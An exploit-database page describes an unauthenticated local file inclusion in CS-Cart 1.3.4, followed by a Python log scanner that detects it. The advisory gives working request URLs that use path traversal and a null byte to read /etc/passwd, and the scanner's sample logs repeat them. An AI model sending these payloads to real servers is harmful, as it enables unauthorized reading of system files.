## https://sploitus.com/exploit?id=PACKETSTORM:159578
# Exploit Title: CS-Cart unauthenticated LFI  
# Date: 2020-09-22  
# Exploit Author: 0xmmnbassel  
# Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html  
# Tested on: ver. 1.3.4  
# Vulnerability Type: unauthenticated LFI  
  
  
http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=[evil_scripts]%00  
Example:  
http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00  
http://www.site.com/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
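
For defenders reviewing web server logs, the following added example (not part of the original advisory) flags requests that set `classes_dir` on `class.cs_phpmailer.php`, including double-encoded variants. It assumes combined log format; the function names, reason labels and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TARGET_SCRIPT = "/class.cs_phpmailer.php"  # script named in the advisory
TARGET_PARAM = "classes_dir"               # parameter named in the advisory

# Constructed sample lines (combined log format assumed), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Sep/2020:10:00:00 +0000] "GET /classes/phpmailer/'
    'class.cs_phpmailer.php?classes_dir=../../../../etc/passwd%00 HTTP/1.1" 200 1532',
    '203.0.113.5 - - [22/Sep/2020:10:00:02 +0000] "GET /classes/phpmailer/'
    'class.cs_phpmailer.php?classes_dir=%252e%252e%252fetc%252fpasswd%2500 HTTP/1.1" 200 1532',
    '198.51.100.7 - - [22/Sep/2020:10:01:00 +0000] "GET /index.php?target=products HTTP/1.1" 200 8841',
]

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (e.g. %252e) so encoded variants are still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return the reasons a log line matches the advisory's pattern ([] if none)."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not fully_decode(url.path).lower().endswith(TARGET_SCRIPT):
        return []
    reasons = []
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name != TARGET_PARAM:
            continue
        value = fully_decode(value).replace("\\", "/")
        reasons.append("include-path-param")  # parameter supplied from the URL at all
        if ".." in value.split("/"):
            reasons.append("traversal")
        if "\x00" in value:
            reasons.append("null-byte")
    return reasons

def scan(lines):
    """Map 1-based line numbers to reasons for every flagged line."""
    return {n: r for n, line in enumerate(lines, 1) if (r := classify(line))}

if __name__ == "__main__":
    for lineno, reasons in scan(SAMPLE_LOG).items():
        print(lineno, ", ".join(reasons))
```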